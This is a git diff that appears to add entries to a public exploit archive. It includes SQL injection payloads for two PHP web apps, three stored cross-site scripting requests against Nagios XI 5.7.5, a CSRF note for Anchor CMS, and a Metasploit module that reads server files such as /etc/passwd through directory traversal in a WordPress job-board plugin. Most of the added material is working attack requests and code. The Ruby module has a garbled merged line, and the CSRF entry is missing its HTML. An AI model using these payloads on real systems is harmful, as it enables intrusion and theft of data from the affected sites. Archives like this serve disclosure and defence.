diff --git a/exploits/multiple/webapps/49451.html b/exploits/multiple/webapps/49451.html
new file mode 100644
index 000000000..f4a072e9c
--- /dev/null
+++ b/exploits/multiple/webapps/49451.html
@@ -0,0 +1,19 @@
+# Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user)
+# Exploit Author: Ninad Mishra
+# Vendor Homepage: https://anchorcms.com/
+# Software Link: https://anchorcms.com/download
+# Version: 0.12.7
+# CVE : CVE-2020-23342
+
+
+###PoC
+the cms uses get method to perform sensitive actions hence users can be deleted via exploit.html
+
+================================
+
+================================
+Where (21) is the user id .
+
+When admin clicks on exploit.html link
+
+User with id 21 will be deleted
\ No newline at end of file
diff --git a/exploits/php/webapps/49447.txt b/exploits/php/webapps/49447.txt
new file mode 100644
index 000000000..1f82d31fe
--- /dev/null
+++ b/exploits/php/webapps/49447.txt
@@ -0,0 +1,50 @@
+# Exploit Title: Online Documents Sharing Platform 1.0 - 'user' SQL Injection
+# Date: 21.01.2021
+# Exploit Author: CANKAT ÇAKMAK
+# Vendor Homepage: https://www.sourcecodester.com/php/14653/online-documents-sharing-platform-php-full-source-code.html
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/notes.zip
+# Version: V1.0
+# Tested on: Windows 10
+
+#Description: The 'user' parameterer is vulnerable to error-based and time-based SQL Injection.
+
+----------------------------------------------------
+
+POST /path/login.php HTTP/1.1
+Host: test.com
+Content-Length: 29
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://test.com
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
+(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://test.com/path/login.php
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+
+user=%27&pass=%27&login=login
+
+----------------------------------------------------
+
+#PoC:
+
+Parameter: user (POST)
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
+GROUP BY clause (FLOOR)
+ Payload: user=' AND (SELECT 2047 FROM(SELECT
+COUNT(*),CONCAT(0x7176706a71,(SELECT
+(ELT(2047=2047,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NRPK&pass='&login=login
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: user=' AND (SELECT 2110 FROM (SELECT(SLEEP(5)))pSYW)--
+HnhM&pass='&login=login
\ No newline at end of file
diff --git a/exploits/php/webapps/49448.txt b/exploits/php/webapps/49448.txt
new file mode 100644
index 000000000..ab5f3a3ef
--- /dev/null
+++ b/exploits/php/webapps/49448.txt
@@ -0,0 +1,42 @@
+# Exploit Title: Apartment Visitors Management System 1.0 - 'email' SQL Injection
+# Date: 20.01.2021
+# Exploit Author: CANKAT ÇAKMAK
+# Vendor Homepage: https://phpgurukul.com/apartment-visitors-management-system-using-php-and-mysql/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10395
+# Version: V1.0
+# Tested on: Windows 10
+
+----------------------------------------------------
+
+POST /avms/forgot-password.php HTTP/1.1
+Host: test.com
+Content-Length: 42
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: test.com
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88
+Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: same-origin
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Referer: http://test.com/avms/forgot-password.php
+Accept-Encoding: gzip, deflate
+Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
+
+
+email=test%40gmail.com&contactno=1&submit=
+
+----------------------------------------------------
+
+poC:
+
+
+Parameter: email (POST)
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: email=test@gmail.com' AND (SELECT 2600 FROM
+(SELECT(SLEEP(5)))jpeB) AND 'WVFv'='WVFv&contactno=1&submit=
\ No newline at end of file
diff --git a/exploits/php/webapps/49449.txt b/exploits/php/webapps/49449.txt
new file mode 100644
index 000000000..b4c064ad6
--- /dev/null
+++ b/exploits/php/webapps/49449.txt
@@ -0,0 +1,87 @@
+# Exploit Title: Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting
+# Date: 1-20-2021
+# Exploit Author: Matthew Aberegg
+# Vendor Homepage: https://www.nagios.com/products/nagios-xi/
+# Vendor Changelog: https://www.nagios.com/downloads/nagios-xi/change-log/
+# Software Link: https://www.nagios.com/downloads/nagios-xi/
+# Version: Nagios XI 5.7.5
+# Tested on: Ubuntu 18.04
+
+
+# Vulnerability Details
+# Description : A persistent cross-site scripting vulnerability exists in the "My Tools" functionality of Nagios XI.
+# Vulnerable Parameter : url
+
+
+# POC
+# Exploit Details : The following request will create a tool with an XSS payload. Click on the URL link for the malicious tool to trigger the payload.
+
+POST /nagiosxi/tools/mytools.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 145
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/nagiosxi/tools/mytools.php?edit=1
+Cookie: nagiosxi=5kbmap730ic023ig2q0bpdefas
+Upgrade-Insecure-Requests: 1
+
+nsp=a2569a2507c7c69600769ca7388614b4264ab9479c560ac62bbc5f9fd76c2524&update=1&id=-1&name=XSS+Test&url=%27+onclick%3D%27alert%281%29&updateButton=
+
+
+############################################################################################################
+
+# Vulnerability Details
+# Description : A persistent cross-site scripting vulnerability exists in "Business Process Intelligence" functionality of Nagios XI.
+# Vulnerable Parameter : groupID
+
+
+# POC
+# Exploit Details : The following request will create a BPI group with an XSS payload. Click on the Group ID for the malicious BPI group to trigger the payload.
+
+POST /nagiosxi/includes/components/nagiosbpi/index.php?cmd=add HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 186
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/nagiosxi/includes/components/nagiosbpi/index.php?cmd=add&tab=add
+Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td
+Upgrade-Insecure-Requests: 1
+
+groupID=%27onclick%3Dalert%281%29%2F%2F&groupType=default&groupTitle=TEST&groupDesc=&groupInfoUrl=&groupPrimary=1&groupWarn=90&groupCrit=80&groupDisplay=2&addSubmitted=true
+
+
+############################################################################################################
+
+# Vulnerability Details
+# Description : A persistent cross-site scripting vulnerability exists in "Views" functionality of Nagios XI.
+# Vulnerable Parameter : url
+
+
+# POC
+# Exploit Details : The following request will create a view with an XSS payload. Click on the malicious view to trigger the payload.
+
+POST /nagiosxi/ajaxhelper.php HTTP/1.1
+Host: TARGET
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 147
+Origin: http://TARGET
+Connection: close
+Referer: http://TARGET/nagiosxi/account/
+Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td
+
+cmd=addview&url=javascript:alert(1)&title=TESTVIEW&submitButton=&nsp=c97136052a4b8d7d535c7d4a7a32389a5882c65cb34f2c36b849f72af52b2056
\ No newline at end of file
diff --git a/exploits/php/webapps/49450.rb b/exploits/php/webapps/49450.rb
new file mode 100755
index 000000000..2ee36db20
--- /dev/null
+++ b/exploits/php/webapps/49450.rb
@@ -0,0 +1,89 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+ include Msf::Auxiliary::Report
+ include Msf::Exploit::Remote::HTTP::Wordpress
+ include Msf::Auxiliary::Scanner
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Simple JobBoard Authenticated File Read Vulnerability',
+ 'Description' => %q{
+ This module exploits an authenticated directory traversal vulnerability in WordPress plugin 'Simple JobBoard ' < 2.9.3,
+ allowing arbitrary file read with the web server privileges.
+ },
+ 'Author' =>
+ [
+ 'Arcangelo Saracino', # Vulnerability discovery
+ 'Hoa Nguyen - Suncsr Team', # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', '2020-35749'],
+ ['WPVDB', 'eed3bd69-2faf-4bc9-915c-c36211ef9e2d'],
+ ['URL','https://arkango.github.io/CVE-2020/CVE-2020-35749%20DIr.%20Traversal%20Simple%20Board%20Job%20Wordpress%20plugin.html']
+ ],
+ 'DisclosureDate' => 'Jan 15 2021'))
+
+ register_options([
+ OptString.new('FILEPATH',[true,'The path to the file to read','/etc/passwd']),
+ OptString.new('USERNAME',[true,'The WordPress username to authenticate with']),
+ OptString.new('PASSWORD',[true,'The Wordpress password to authenticate with']),
+ OptInt.new('DEPTH',[true,'Traversal Depth (to reach the root folder',8]),
+ ])
+ end
+
+ def username
+ datastore['USERNAME']
+ end
+
+ def password
+ datastore['PASSWORD']
+ end
+
+ def check
+ cookie = wordpress_login(username,password)
+ if cookie.nil?
+ store_valid_credential(user: username, private: password, proof: cookie)
+ return CheckCode::Safe
+ end
+ CheckCode::Appears
+ end
+
+ def run_host(ip)
+ cookie = wordpress_login(username, password)
+ traversal = '../' * datastore['DEPTH']
+ filename = datastore['FILEPATH']
+ filename = filename[1, filename.length] if filename =~ /^\//
+
+ res = send_request_cgi({
+ 'cookie' => cookie,
+ 'method' => 'GET',
+ 'uri' => normalize_uri(target_uri.path,'wp-admin',''),
+ 'vars_get' =>
+ {
+ 'post' => 'application_id',
+ 'action' => 'edit',
+ 'sjb_file' => "#{traversal}#{filename}"
+ }
+ })
+
+ fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200
+ fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
+ print_good('Downloading file ...')
+ print_line("\n#{res.body}\n")
+ fname = datastore['FILEPATH']
+ path = store_loot(
+ 'Simple_JobBoard.traversal',
+ 'text/plain',
+ ip,
+ res.body,
+ fname
+ )
+ print_good("File save in: #{path}")
+ end
+ end
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index fd319346d..92458bfc2 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -25890,6 +25890,7 @@ id,file,description,date,author,type,platform,port
49443,exploits/multiple/webapps/49443.py,"ChurchRota 2.6.4 - RCE (Authenticated)",2021-01-20,"Rob McCarthy",webapps,multiple,
49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",2021-01-20,omurugur,webapps,multiple,
49445,exploits/php/webapps/49445.py,"Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)",2021-01-20,"Richard Jones",webapps,php,
+49447,exploits/php/webapps/49447.txt,"Online Documents Sharing Platform 1.0 - 'user' SQL Injection",2021-01-21,"CANKAT ÇAKMAK",webapps,php,
49433,exploits/php/webapps/49433.txt,"Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS",2021-01-15,"Siva Rajendran",webapps,php,
49434,exploits/php/webapps/49434.py,"E-Learning System 1.0 - Authentication Bypass & RCE POC",2021-01-15,"Himanshu Shukla",webapps,php,
49435,exploits/multiple/webapps/49435.rb,"Netsia SEBA+ 0.16.1 - Authentication Bypass and Add Root User (Metasploit)",2021-01-15,AkkuS,webapps,multiple,
@@ -43644,3 +43645,7 @@ id,file,description,date,author,type,platform,port
49436,exploits/hardware/webapps/49436.py,"Cisco UCS Manager 2.2(1d) - Remote Command Execution",2021-01-18,liquidsky,webapps,hardware,
49437,exploits/multiple/webapps/49437.txt,"Xwiki CMS 12.10.2 - Cross Site Scripting (XSS)",2021-01-18,"Karan Keswani",webapps,multiple,
49438,exploits/hardware/webapps/49438.py,"Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated)",2021-01-18,"Henrik Pedersen",webapps,hardware,
+49448,exploits/php/webapps/49448.txt,"Apartment Visitors Management System 1.0 - 'email' SQL Injection",2021-01-21,"CANKAT ÇAKMAK",webapps,php,
+49449,exploits/php/webapps/49449.txt,"Nagios XI 5.7.5 - Multiple Persistent Cross-Site Scripting",2021-01-21,"Matthew Aberegg",webapps,php,
+49450,exploits/php/webapps/49450.rb,"Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit)",2021-01-21,"SunCSR Team",webapps,php,
+49451,exploits/multiple/webapps/49451.html,"Anchor CMS 0.12.7 - CSRF (Delete user)",2021-01-21,"Ninad Mishra",webapps,multiple,